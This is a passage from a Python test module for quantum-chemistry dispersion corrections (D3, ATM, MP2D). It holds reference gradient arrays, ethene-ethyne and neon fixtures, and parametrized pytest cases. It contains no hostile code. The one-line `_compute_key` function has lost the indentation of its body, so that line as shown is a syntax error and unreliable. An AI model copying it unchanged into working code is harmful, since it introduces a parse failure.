        0.00000000000000E+00, 0.00000000000000E+00, 0.98332430764322E-04,
        -0.25410988417629E-20, -0.33881317890172E-20, 0.25661736016373E-03,
        0.00000000000000E+00, 0.00000000000000E+00, 0.13371752089002E-03,
        0.00000000000000E+00, -0.26469779601697E-22, 0.47656084798449E-04]).reshape((-1, 3)),
    np.array([
        -0.25410988417629E-20, -0.31329250082804E-04, 0.61088639781542E-08,
        -0.50821976835258E-20, 0.31329250082804E-04, 0.61088639781542E-08,
        0.21959764459240E-04, -0.47293026603847E-04, -0.30544319890771E-08,
        -0.21959764459240E-04, -0.47293026603847E-04, -0.30544319890771E-08,
        -0.21959764459240E-04, 0.47293026603847E-04, -0.30544319890771E-08,
        0.21959764459240E-04, 0.47293026603847E-04, -0.30544319890771E-08]).reshape((-1, 3)),
    np.array([
        0.00000000000000E+00, 0.00000000000000E+00, 0.25685884880777E-04,
        0.00000000000000E+00, 0.00000000000000E+00, -0.25704336611069E-04,
        0.00000000000000E+00, 0.00000000000000E+00, -0.41528315631943E-04,
        0.00000000000000E+00, 0.00000000000000E+00, 0.41546767362234E-04]).reshape((-1, 3)),
    # monomer-A values padded with zero rows for the ghosted B fragment
    np.array([
        -0.25410988417629E-20, -0.31329250082804E-04, 0.61088639781542E-08,
        -0.50821976835258E-20, 0.31329250082804E-04, 0.61088639781542E-08,
        0.21959764459240E-04, -0.47293026603847E-04, -0.30544319890771E-08,
        -0.21959764459240E-04, -0.47293026603847E-04, -0.30544319890771E-08,
        -0.21959764459240E-04, 0.47293026603847E-04, -0.30544319890771E-08,
        0.21959764459240E-04, 0.47293026603847E-04, -0.30544319890771E-08,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
    # monomer-B values padded with zero rows for the ghosted A fragment
    np.array([
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.25685884880777E-04,
        0.00000000000000E+00, 0.00000000000000E+00, -0.25704336611069E-04,
        0.00000000000000E+00, 0.00000000000000E+00, -0.41528315631943E-04,
        0.00000000000000E+00, 0.00000000000000E+00, 0.41546767362234E-04]).reshape((-1, 3)),
])) # yapf: disable
# Reference gradients for the Axilrod-Teller-Muto (ATM) 3-body term on the
# same fragments; structure parallels the PBE-D3(BJ) table above.
gref['eneyne']['ATM'] = dict(zip(dmm, [
    np.array([
        0.00000000000000E+00, -0.57988139838201E-06, -0.71628554331971E-06,
        0.00000000000000E+00, 0.57988139838201E-06, -0.71628554331971E-06,
        0.53149296386534E-06, -0.41638019417978E-06, 0.52694338024860E-06,
        -0.53149296386534E-06, -0.41638019417978E-06, 0.52694338024860E-06,
        -0.53149296386533E-06, 0.41638019417978E-06, 0.52694338024860E-06,
        0.53149296386533E-06, 0.41638019417978E-06, 0.52694338024858E-06,
        0.00000000000000E+00, 0.00000000000000E+00, -0.92557313363084E-06,
        0.00000000000000E+00, 0.00000000000000E+00, 0.31010265235900E-06,
        0.00000000000000E+00, 0.00000000000000E+00, 0.10194777599160E-05,
        0.00000000000000E+00, 0.00000000000000E+00, -0.10792097129990E-05]).reshape((-1, 3)),
    np.array([
        0.00000000000000E+00, -0.45154573778694E-07, 0.11131133827146E-09,
        0.00000000000000E+00, 0.45154573778707E-07, 0.11131133827146E-09,
        0.10133274017225E-06, -0.72175367263952E-07, -0.55655669135736E-10,
        -0.10133274017225E-06, -0.72175367263966E-07, -0.55655669135736E-10,
        -0.10133274017227E-06, 0.72175367263952E-07, -0.55655669135736E-10,
        0.10133274017227E-06, 0.72175367263966E-07, -0.55655669135736E-10]).reshape((-1, 3)),
    np.array([
        0.00000000000000E+00, 0.00000000000000E+00, 0.14079365564105E-07,
        0.00000000000000E+00, 0.00000000000000E+00, -0.14067311316192E-07,
        0.00000000000000E+00, 0.00000000000000E+00, 0.67277034390041E-07,
        0.00000000000000E+00, 0.00000000000000E+00, -0.67289088637954E-07]).reshape((-1, 3)),
    # monomer-A values padded with zero rows for the ghosted B fragment
    np.array([
        0.00000000000000E+00, -0.45154573778694E-07, 0.11131133827146E-09,
        0.00000000000000E+00, 0.45154573778707E-07, 0.11131133827146E-09,
        0.10133274017225E-06, -0.72175367263952E-07, -0.55655669135736E-10,
        -0.10133274017225E-06, -0.72175367263966E-07, -0.55655669135736E-10,
        -0.10133274017227E-06, 0.72175367263952E-07, -0.55655669135736E-10,
        0.10133274017227E-06, 0.72175367263966E-07, -0.55655669135736E-10,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
    # monomer-B values padded with zero rows for the ghosted A fragment
    np.array([
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.14079365564105E-07,
        0.00000000000000E+00, 0.00000000000000E+00, -0.14067311316192E-07,
        0.00000000000000E+00, 0.00000000000000E+00, 0.67277034390041E-07,
        0.00000000000000E+00, 0.00000000000000E+00, -0.67289088637954E-07]).reshape((-1, 3)),
])) # yapf: disable
# Reference gradients for the MP2-DMP2 dispersion correction (mp2d program);
# note these entries mix plain-exponent and Fortran-style E-notation literals.
gref['eneyne']['MP2-DMP2'] = dict(zip(dmm, [
    np.array([
        0.000000000000, 8.33766812971e-05, 0.000109143431777,
        0.000000000000, -8.33766812971e-05, 0.000109143431777,
        6.65762086716e-05, -8.48726541848e-06, -6.94161475862e-06,
        -6.65762086716e-05, -8.48726541848e-06, -6.94161475862e-06,
        -6.65762086716e-05, 8.48726541848e-06, -6.94161475862e-06,
        6.65762086716e-05, 8.48726541848e-06, -6.94161475862e-06,
        0.00000000000, 0.00000000000, -6.06356381132e-05,
        0.00000000000, 0.00000000000, -0.000146587460686,
        0.00000000000, 0.00000000000, 5.56226390549e-05,
        0.00000000000, 0.00000000000, -3.89199447758e-05]).reshape((-1, 3)),
    np.array([
        0.00000000000, 6.40910926532e-05, -5.69353173759e-08,
        0.00000000000, -6.40910926532e-05, -5.69353173759e-08,
        6.40446102957e-05, -5.1224992828e-06, 2.84676586879e-08,
        -6.40446102957e-05, -5.1224992828e-06, 2.84676586879e-08,
        -6.40446102957e-05, 5.1224992828e-06, 2.84676586879e-08,
        6.40446102957e-05, 5.1224992828e-06, 2.84676586879e-08]).reshape((-1, 3)),
    np.array([
        0.00000000000000E+00, 0.00000000000000E+00, -3.49290530324e-05,
        0.00000000000000E+00, 0.00000000000000E+00, 3.41911680578e-05,
        0.00000000000000E+00, 0.00000000000000E+00, 3.99755714285e-05,
        0.00000000000000E+00, 0.00000000000000E+00, -3.9237686454e-05]).reshape((-1, 3)),
    # monomer-A values padded with zero rows for the ghosted B fragment
    np.array([
        0.00000000000, 6.40910926532e-05, -5.69353173759e-08,
        0.00000000000, -6.40910926532e-05, -5.69353173759e-08,
        6.40446102957e-05, -5.1224992828e-06, 2.84676586879e-08,
        -6.40446102957e-05, -5.1224992828e-06, 2.84676586879e-08,
        -6.40446102957e-05, 5.1224992828e-06, 2.84676586879e-08,
        6.40446102957e-05, 5.1224992828e-06, 2.84676586879e-08,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
    # monomer-B values padded with zero rows for the ghosted A fragment
    np.array([
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
        0.00000000000000E+00, 0.00000000000000E+00, -3.49290530324e-05,
        0.00000000000000E+00, 0.00000000000000E+00, 3.41911680578e-05,
        0.00000000000000E+00, 0.00000000000000E+00, 3.99755714285e-05,
        0.00000000000000E+00, 0.00000000000000E+00, -3.9237686454e-05]).reshape((-1, 3)),
])) # yapf: disable
# A lone neon atom has no dispersion partner, so every reference gradient is
# a single zero row.
gref['ne'] = {}
gref['ne']['B3LYP-D3(BJ)'] = {'atom': np.zeros(3).reshape((-1, 3))}
gref['ne']['MP2-DMP2'] = {'atom': np.zeros(3).reshape((-1, 3))}
gref['ne']['ATM'] = {'atom': np.zeros(3).reshape((-1, 3))}
# Ethene-ethyne dimer in XYZ-like molparse format; '--' separates fragment A
# (ethene, 6 atoms) from fragment B (ethyne, 4 atoms).
seneyne = """
C 0.000000 -0.667578 -2.124659
C 0.000000 0.667578 -2.124659
H 0.923621 -1.232253 -2.126185
H -0.923621 -1.232253 -2.126185
H -0.923621 1.232253 -2.126185
H 0.923621 1.232253 -2.126185
--
C 0.000000 0.000000 2.900503
C 0.000000 0.000000 1.693240
H 0.000000 0.000000 0.627352
H 0.000000 0.000000 3.963929
"""
# Single neon atom at the origin.
sne = """
Ne 0 0 0
"""
def eneyne_ne_qcdbmols():
    """Build qcdb.Molecule fixtures for the ethene-ethyne dimer and a Ne atom.

    Returns a nested dict: mols['eneyne'] holds the dimer plus monomer and
    ghosted-monomer subsets (mA, mB, mAgB, gAmB); mols['ne'] holds the atom.
    Skips the calling test when the installed Psi4 is too old.
    """
    if not is_program_new_enough("psi4", "1.4a1.dev55"):
        # Fix: the message used to claim v1.3rc2 while the check above
        # requires 1.4a1.dev55; make the message match the actual gate.
        pytest.skip("Psi4 requires at least Psi4 v1.4a1.dev55")
    from psi4.driver import qcdb
    eneyne = qcdb.Molecule(seneyne)
    ne = qcdb.Molecule(sne)
    mols = {
        'eneyne': {
            'dimer': eneyne,
            'mA': eneyne.extract_subsets(1),
            'mB': eneyne.extract_subsets(2),
            'mAgB': eneyne.extract_subsets(1, 2),
            'gAmB': eneyne.extract_subsets(2, 1),
        },
        'ne': {
            'atom': ne,
        }
    }
    return mols
def eneyne_ne_psi4mols():
    """Build psi4.core.Molecule fixtures mirroring eneyne_ne_qcdbmols().

    Returns the same nested dict shape (dimer, mA, mB, mAgB, gAmB, atom).
    Skips the calling test when the installed Psi4 is too old.
    """
    if not is_program_new_enough("psi4", "1.4a1.dev55"):
        # Fix: the message used to claim v1.3rc2 while the check above
        # requires 1.4a1.dev55; make the message match the actual gate.
        pytest.skip("Psi4 requires at least Psi4 v1.4a1.dev55")
    import psi4
    eneyne = psi4.core.Molecule.from_string(seneyne)
    ne = psi4.core.Molecule.from_string(sne)
    mols = {
        'eneyne': {
            'dimer': eneyne,
            'mA': eneyne.extract_subsets(1),
            'mB': eneyne.extract_subsets(2),
            'mAgB': eneyne.extract_subsets(1, 2),
            'gAmB': eneyne.extract_subsets(2, 1),
        },
        'ne': {
            'atom': ne,
        }
    }
    return mols
def eneyne_ne_qcschemamols():
    """Build QCSchema (dtype=2) molecule dicts mirroring the Molecule fixtures.

    Monomers are carved out of the ``seneyne`` string by line slicing:
    the first 7 lines (leading blank + 6 ethene atoms) give mA, the last
    4 lines give mB. Ghosted variants flip the per-atom 'real' flags instead.
    """
    eneyne = qcel.molparse.to_schema(qcel.molparse.from_string(seneyne)['qm'], dtype=2)
    mA = qcel.molparse.to_schema(qcel.molparse.from_string('\n'.join(seneyne.splitlines()[:7]))['qm'], dtype=2)
    mB = qcel.molparse.to_schema(qcel.molparse.from_string('\n'.join(seneyne.splitlines()[-4:]))['qm'], dtype=2)
    ne = qcel.molparse.to_schema(qcel.molparse.from_string(sne)['qm'], dtype=2)
    # mAgB: atoms before the first fragment separator stay real, B is ghosted.
    mAgB = qcel.molparse.from_string(seneyne)['qm']
    mAgB['real'] = [(iat < mAgB['fragment_separators'][0])
                    for iat in range(len(mAgB['elem']))]  # works b/c chgmult doesn't need refiguring
    mAgB = qcel.molparse.to_schema(mAgB, dtype=2)
    # gAmB: the mirror image — A ghosted, B real.
    gAmB = qcel.molparse.from_string(seneyne)['qm']
    gAmB['real'] = [(iat >= gAmB['fragment_separators'][0]) for iat in range(len(gAmB['elem']))]
    gAmB = qcel.molparse.to_schema(gAmB, dtype=2)
    mols = {
        'eneyne': {
            'dimer': eneyne,
            'mA': mA,
            'mB': mB,
            'mAgB': mAgB,
            'gAmB': gAmB,
        },
        'ne': {
            'atom': ne,
        }
    }
    return mols
# Expected `from_arrays` result records for the parametrized tests below:
# resolved dispersion level, parameter set, citation, and canonical label.
db3lypd3bj = {
    'dashlevel': 'd3bj',
    'dashparams': {
        's8': 1.9889,
        's6': 1.0,
        'a2': 4.4211,
        'a1': 0.3981
    },
    'dashparams_citation': '',
    'fctldash': 'b3lyp-d3(bj)'
}
# Same as above but with a tweaked a2; the nonstandard parameter set means
# no canonical functional-dispersion label applies, hence the empty fctldash.
db3lypd3bjcustom = copy.deepcopy(db3lypd3bj)
db3lypd3bjcustom['fctldash'] = ''
db3lypd3bjcustom['dashparams']['a2'] = 5.4211
dpbed3zero = {
    'dashlevel': 'd3zero',
    'dashparams': {
        's6': 1.0,
        's8': 0.722,
        'sr6': 1.217,
        'sr8': 1.0,
        'alpha6': 14.0
    },
    'dashparams_citation': '',
    'fctldash': 'pbe-d3'
}
# Standalone Axilrod-Teller-Muto 3-body correction (no functional pairing).
atmgr = {
    'dashlevel': 'atmgr',
    'dashparams': {
        'alpha6': 14.0,
    },
    'dashparams_citation': '',
    'fctldash': 'atm(gr)',
}
chg = {
    'dashlevel': 'chg',
    'dashparams': {
        's6': 1.0,
    },
    'dashparams_citation': '',
    'fctldash': 'chg',
}
dmp2dmp2 = {
    'dashlevel': 'dmp2',
    'dashparams': {
        's8': 1.187,
        'a1': 0.944,
        'a2': 0.480,
        'rcut': 0.72,
        'w': 0.20,
    },
    'dashparams_citation': '',
    'fctldash': 'mp2-dmp2'
}
def _compute_key(pjrec):
return pjrec['fctldash'].upper()
## Tests
@pytest.mark.parametrize("inp,expected", [
    (({'name_hint': 'b3lyp', 'level_hint': 'd3bj'}, 'B3LYP-D3(BJ)'), db3lypd3bj),
    (({'name_hint': 'b3LYP', 'level_hint': 'D3bj'}, 'B3LYP-D3(BJ)'), db3lypd3bj),
    (({'param_tweaks': {'s8': 1.9889, 's6': 1.0, 'a2': 4.4211, 'a1': 0.3981}, 'level_hint': 'd3bj'}, 'B3LYP-D3(BJ)'), db3lypd3bj),
    (({'name_hint': 'b3lyp', 'level_hint': 'd3bJ', 'param_tweaks': {'a2': 4.4211}}, 'B3LYP-D3(BJ)'), db3lypd3bj),
    (({'verbose': 3, 'name_hint': 'b3lyp', 'level_hint': 'd3bJ', 'param_tweaks': {'a2': 5.4211}}, ''), db3lypd3bjcustom),
    (({'name_hint': 'b3lyp-d3bj', 'param_tweaks': {'a2': 4.4211}}, 'B3LYP-D3(BJ)'), db3lypd3bj),
    (({'name_hint': 'pbe', 'level_hint': 'd3zero'}, 'PBE-D3'), dpbed3zero),
    (({'name_hint': 'pbe', 'level_hint': 'd3'}, 'PBE-D3'), dpbed3zero),
    (({'name_hint': 'pbe-d3'}, 'PBE-D3'), dpbed3zero),
    (({'name_hint': 'atm(gr)', 'level_hint': 'atmgr'}, 'ATM(GR)'), atmgr),
    (({'name_hint': 'atmgr'}, 'ATM(GR)'), atmgr),
    (({'name_hint': 'bp86-atmgr'}, 'ATM(GR)'), atmgr),
    (({'name_hint': 'asdf-chg'}, 'CHG'), chg),
    (({'name_hint': 'mp2-dmp2'}, 'MP2-DMP2'), dmp2dmp2),
    (({'name_hint': 'MP2', 'level_hint': 'dmp2'}, 'MP2-DMP2'), dmp2dmp2),
]) # yapf: disable
def test_dftd3__from_arrays(inp, expected):
    """Hints/tweaks resolve to the expected record, and the resolution is
    idempotent: feeding the resolved record back in reproduces it."""
    res = empirical_dispersion_resources.from_arrays(**inp[0])
    assert compare_recursive(expected, res, atol=1.e-4)
    assert compare(inp[1], _compute_key(res), 'key')
    # Round-trip: a fully resolved record must resolve to itself.
    res = empirical_dispersion_resources.from_arrays(name_hint=res['fctldash'],
                                                     level_hint=res['dashlevel'],
                                                     param_tweaks=res['dashparams'])
    assert compare_recursive(expected, res, tnm() + ' idempotent', atol=1.e-4)
@pytest.mark.parametrize("inp", [
    ({'name_hint': 'b3lyp', 'level_hint': 'd3bJ', 'param_tweaks': {'a3': 5.4211}}),   # unknown param name
    ({'name_hint': 'fakeb3lyp', 'level_hint': 'd3bJ', 'param_tweaks': {'s6': 5.4211}}),  # unknown functional
    ({'level_hint': 'd3bJ', 'param_tweaks': {'s6': 5.4211}}),   # incomplete parameter set
    ({'name_hint': 'b3lyp-d3bj', 'param_tweaks': {'a2': 4.4211, 'zzz': 0.0}}),  # stray param
    ({'name_hint': 'asdf-d4'}),                       # unguessable level
    ({'name_hint': 'atm(gr)', 'level_hint': 'chg'}),  # name/level mismatch
]) # yapf:disable
def test_dftd3__from_arrays__error(inp):
    """Malformed hint/tweak combinations must raise InputError."""
    with pytest.raises(qcng.exceptions.InputError):
        empirical_dispersion_resources.from_arrays(**inp)
def test_dftd3__from_arrays__supplement():
    """A dashcoeff_supplement can define a novel functional label; resolving
    that label then works only while the supplement is supplied."""
    ans = {
        'dashlevel': 'chg',
        'dashparams': {
            's6': 4.05
        },
        'fctldash': 'asdf-d4',
        'dashparams_citation': ' mypaper\n'
    }
    supp = {'chg': {'definitions': {'asdf-d4': {'params': {'s6': 4.05}, 'citation': ' mypaper\n'}}}}
    res = empirical_dispersion_resources.from_arrays(name_hint='asdf-d4', level_hint='chg', dashcoeff_supplement=supp)
    assert compare_recursive(ans, res, atol=1.e-4)
    # Without the supplement the custom label is unknown again.
    with pytest.raises(qcng.exceptions.InputError) as e:
        empirical_dispersion_resources.from_arrays(name_hint=res['fctldash'],
                                                   level_hint=res['dashlevel'],
                                                   param_tweaks=res['dashparams'])
    assert "Can't guess -D correction level" in str(e.value)
    # With the supplement the resolution is idempotent.
    res = empirical_dispersion_resources.from_arrays(name_hint=res['fctldash'],
                                                     level_hint=res['dashlevel'],
                                                     param_tweaks=res['dashparams'],
                                                     dashcoeff_supplement=supp)
    assert compare_recursive(ans, res, tnm() + ' idempotent', atol=1.e-4)
@using_dftd3
def test_3():
    """Smoke test: qcng.compute with the dftd3 harness resolves the
    b3lyp + d3bj hints into the canonical B3LYP-D3(BJ) keyword record."""
    sys = qcel.molparse.from_string(seneyne)['qm']
    resinp = {
        'schema_name': 'qcschema_input',
        'schema_version': 1,
        'molecule': qcel.molparse.to_schema(sys, dtype=2),
        'driver': 'energy',
        'model': {
            'method': 'b3lyp',
        },
        'keywords': {
            'level_hint': 'd3bj'
        },
    }
    res = qcng.compute(resinp, 'dftd3', raise_error=True)
    res = res.dict()
    assert compare('B3LYP-D3(BJ)', _compute_key(res['extras']['local_keywords']), 'key')
@using_dftd3
@pytest.mark.parametrize(
    "subjects",
    [
        pytest.param(eneyne_ne_psi4mols, marks=using_psi4),
        pytest.param(eneyne_ne_qcdbmols,
                     marks=using_psi4),  # needs qcdb.Molecule, presently more common in psi4 than in qcdb
    ],
    ids=['qmol', 'pmol'])
@pytest.mark.parametrize(
    "inp", [
        ({'first': 'b3lyp', 'second': 'd', 'parent': 'eneyne', 'subject': 'dimer', 'lbl': 'B3LYP-D2'}),
        ({'first': 'b3lyp', 'second': 'd3bj', 'parent': 'eneyne', 'subject': 'mA', 'lbl': 'B3LYP-D3(BJ)'}),
        ({'first': 'pbe', 'second': 'd3zero', 'parent': 'eneyne', 'subject': 'mB', 'lbl': 'PBE-D3'}),
        ({'first': 'pbe', 'second': 'd3zero', 'parent': 'eneyne', 'subject': 'gAmB', 'lbl': 'PBE-D3'}),
        ({'first': 'pbe', 'second': 'd2', 'parent': 'eneyne', 'subject': 'mAgB', 'lbl': 'PBE-D2'}),
        ({'first': 'b3lyp', 'second': 'd3bj', 'parent': 'ne', 'subject': 'atom', 'lbl': 'B3LYP-D3(BJ)'}),
        #({'first': '', 'second': 'atmgr', 'parent': 'eneyne', 'subject': 'dimer', 'lbl': 'ATM'}),
        #({'first': 'b3lyp', 'second': 'atmgr', 'parent': 'eneyne', 'subject': 'mA', 'lbl': 'ATM'}),
        #({'first': 'pbe', 'second': 'atm(gr)', 'parent': 'eneyne', 'subject': 'mB', 'lbl': 'ATM'}),
        #({'first': '', 'second': 'ATMgr', 'parent': 'eneyne', 'subject': 'mAgB', 'lbl': 'ATM'}),
        # below two xfail until dftd3 that's only 2-body is out of psi4 proper
        pytest.param({'first': 'atmgr', 'second': 'atmgr', 'parent': 'eneyne', 'subject': 'gAmB', 'lbl': 'ATM'}, marks=[using_dftd3_321]),
        pytest.param({'first': 'pbe-atmgr', 'second': None, 'parent': 'ne', 'subject': 'atom', 'lbl': 'ATM'}, marks=[using_dftd3_321]),
    ]) # yapf: disable
def test_molecule__run_dftd3__23body(inp, subjects):
    """Molecule.run_dftd3 energy and gradient match the reference tables
    (`ref` defined earlier in the file, `gref` above) for 2- and 3-body runs."""
    subject = subjects()[inp['parent']][inp['subject']]
    expected = ref[inp['parent']][inp['lbl']][inp['subject']]
    gexpected = gref[inp['parent']][inp['lbl']][inp['subject']]
    E, G = subject.run_dftd3(inp['first'], inp['second'])
    assert compare_values(expected, E, atol=1.e-7)
    assert compare_values(gexpected, G, atol=1.e-7)
@using_qcdb
def test_qcdb__energy_d3():
    """qcdb.energy('d3-...') returns the dispersion correction as both the
    return value and the generic/labeled QCVariables, for dimer and monomer."""
    eneyne = qcdb.set_molecule(seneyne)
    eneyne.update_geometry()
    E, jrec = qcdb.energy('d3-b3lyp-d2', return_wfn=True)
    assert compare_values(ref['eneyne']['B3LYP-D2']['dimer'], E, 7, 'P: Ethene-Ethyne -D2')
    assert compare_values(ref['eneyne']['B3LYP-D2']['dimer'], jrec['qcvars']['DISPERSION CORRECTION ENERGY'].data, 7,
                          tnm())
    assert compare_values(ref['eneyne']['B3LYP-D2']['dimer'],
                          jrec['qcvars']['B3LYP-D2 DISPERSION CORRECTION ENERGY'].data, 7, tnm())
    # Repeat on monomer A with a different dispersion level.
    mA = eneyne.extract_subsets(1)
    E, jrec = qcdb.energy('d3-b3lyp-d3bj', return_wfn=True, molecule=mA)
    assert compare_values(ref['eneyne']['B3LYP-D3(BJ)']['mA'], E, 7, tnm())
    assert compare_values(ref['eneyne']['B3LYP-D3(BJ)']['mA'], jrec['qcvars']['DISPERSION CORRECTION ENERGY'].data, 7,
                          tnm())
    assert compare_values(ref['eneyne']['B3LYP-D3(BJ)']['mA'],
                          jrec['qcvars']['B3LYP-D3(BJ) DISPERSION CORRECTION ENERGY'].data, 7, tnm())
@using_mp2d
@pytest.mark.parametrize(
    "subjects",
    [
        pytest.param(eneyne_ne_psi4mols, marks=using_psi4),
        pytest.param(eneyne_ne_qcdbmols,
                     marks=using_psi4),  # needs qcdb.Molecule, presently more common in psi4 than in qcdb
        pytest.param(eneyne_ne_qcschemamols),
    ],
    ids=['qmol', 'pmol', 'qcmol'])
@pytest.mark.parametrize("inp", [
    ({'parent': 'eneyne', 'name': 'mp2d-mp2-dmp2', 'subject': 'dimer', 'lbl': 'MP2-DMP2'}),
    ({'parent': 'eneyne', 'name': 'mp2d-mp2-dmp2', 'subject': 'mA', 'lbl': 'MP2-DMP2'}),
    ({'parent': 'eneyne', 'name': 'mp2d-mp2-dmp2', 'subject': 'mB', 'lbl': 'MP2-DMP2'}),
    ({'parent': 'eneyne', 'name': 'mp2d-mp2-dmp2', 'subject': 'gAmB', 'lbl': 'MP2-DMP2'}),
    ({'parent': 'eneyne', 'name': 'mp2d-mp2-dmp2', 'subject': 'mAgB', 'lbl': 'MP2-DMP2'}),
    ({'parent': 'ne', 'name': 'mp2d-mp2-dmp2', 'subject': 'atom', 'lbl': 'MP2-DMP2'}),
]) # yapf: disable
def test_mp2d__run_mp2d__2body(inp, subjects, request):
    """mp2d gradient run through qcng.compute reproduces the reference
    energies and (flattened) gradients in the result QCVariables."""
    subject = subjects()[inp['parent']][inp['subject']]
    expected = ref[inp['parent']][inp['lbl']][inp['subject']]
    gexpected = gref[inp['parent']][inp['lbl']][inp['subject']].ravel()
    # qcschema fixtures are already schema dicts; Molecule objects need conversion.
    if 'qcmol' in request.node.name:
        mol = subject
    else:
        mol = subject.to_schema(dtype=2)
    resinp = {
        'schema_name': 'qcschema_input',
        'schema_version': 1,
        'molecule': mol,
        'driver': 'gradient',
        'model': {
            'method': inp['name']
        },
        'keywords': {},
    }
    jrec = qcng.compute(resinp, 'mp2d', raise_error=True)
    jrec = jrec.dict()
    #assert len(jrec['extras']['qcvars']) == 8
    assert compare_values(expected, jrec['extras']['qcvars']['CURRENT ENERGY'], atol=1.e-7)
    assert compare_values(expected, jrec['extras']['qcvars']['DISPERSION CORRECTION ENERGY'], atol=1.e-7)
    assert compare_values(expected, jrec['extras']['qcvars'][inp['lbl'] + ' DISPERSION CORRECTION ENERGY'], atol=1.e-7)
    assert compare_values(gexpected, jrec['extras']['qcvars']['CURRENT GRADIENT'], atol=1.e-7)
    assert compare_values(gexpected, jrec['extras']['qcvars']['DISPERSION CORRECTION GRADIENT'], atol=1.e-7)
    assert compare_values(gexpected,
                          jrec['extras']['qcvars'][inp['lbl'] + ' DISPERSION CORRECTION GRADIENT'],
                          atol=1.e-7)
@using_dftd3
@pytest.mark.parametrize(
    "subjects",
    [
        pytest.param(eneyne_ne_psi4mols, marks=using_psi4),
        pytest.param(eneyne_ne_qcdbmols,
                     marks=using_psi4),  # needs qcdb.Molecule, presently more common in psi4 than in qcdb
        pytest.param(eneyne_ne_qcschemamols),
    ],
    ids=['qmol', 'pmol', 'qcmol'])
@pytest.mark.parametrize("inp", [
    ({'parent': 'eneyne', 'name': 'd3-b3lyp-d', 'subject': 'dimer', 'lbl': 'B3LYP-D2'}),
    ({'parent': 'eneyne', 'name': 'd3-b3lyp-d3bj', 'subject': 'mA', 'lbl': 'B3LYP-D3(BJ)'}),
    ({'parent': 'eneyne', 'name': 'd3-PBE-D3zero', 'subject': 'mB', 'lbl': 'PBE-D3'}),
    ({'parent': 'eneyne', 'name': 'd3-PBE-D3zero', 'subject': 'gAmB', 'lbl': 'PBE-D3'}),
    ({'parent': 'eneyne', 'name': 'd3-PBE-D2', 'subject': 'mAgB', 'lbl': 'PBE-D2'}),
    ({'parent': 'ne', 'name': 'd3-b3lyp-d3bj', 'subject': 'atom', 'lbl': 'B3LYP-D3(BJ)'}),
]) # yapf: disable
def test_dftd3__run_dftd3__2body(inp, subjects, request):
    """dftd3 2-body gradient run through qcng.compute: reference values must
    appear under CURRENT, generic, 2-BODY, and labeled QCVariables."""
    subject = subjects()[inp['parent']][inp['subject']]
    expected = ref[inp['parent']][inp['lbl']][inp['subject']]
    gexpected = gref[inp['parent']][inp['lbl']][inp['subject']].ravel()
    # qcschema fixtures are already schema dicts; Molecule objects need conversion.
    if 'qcmol' in request.node.name:
        mol = subject
    else:
        mol = subject.to_schema(dtype=2)
    resinp = {
        'schema_name': 'qcschema_input',
        'schema_version': 1,
        'molecule': mol,
        'driver': 'gradient',
        'model': {
            'method': inp['name']
        },
        'keywords': {},
    }
    jrec = qcng.compute(resinp, 'dftd3', raise_error=True)
    jrec = jrec.dict()
    assert len(jrec['extras']['qcvars']) == 8
    assert compare_values(expected, jrec['extras']['qcvars']['CURRENT ENERGY'], atol=1.e-7)
    assert compare_values(expected, jrec['extras']['qcvars']['DISPERSION CORRECTION ENERGY'], atol=1.e-7)
    assert compare_values(expected, jrec['extras']['qcvars']['2-BODY DISPERSION CORRECTION ENERGY'], atol=1.e-7)
    assert compare_values(expected, jrec['extras']['qcvars'][inp['lbl'] + ' DISPERSION CORRECTION ENERGY'], atol=1.e-7)
    assert compare_values(gexpected, jrec['extras']['qcvars']['CURRENT GRADIENT'], atol=1.e-7)
    assert compare_values(gexpected, jrec['extras']['qcvars']['DISPERSION CORRECTION GRADIENT'], atol=1.e-7)
    assert compare_values(gexpected, jrec['extras']['qcvars']['2-BODY DISPERSION CORRECTION GRADIENT'], atol=1.e-7)
    assert compare_values(gexpected,
                          jrec['extras']['qcvars'][inp['lbl'] + ' DISPERSION CORRECTION GRADIENT'],
                          atol=1.e-7)
@using_dftd3_321
@pytest.mark.parametrize(
    "subjects",
    [
        pytest.param(eneyne_ne_psi4mols, marks=using_psi4),
        pytest.param(eneyne_ne_qcdbmols,
                     marks=using_psi4),  # needs qcdb.Molecule, presently more common in psi4 than in qcdb
        pytest.param(eneyne_ne_qcschemamols),
    ],
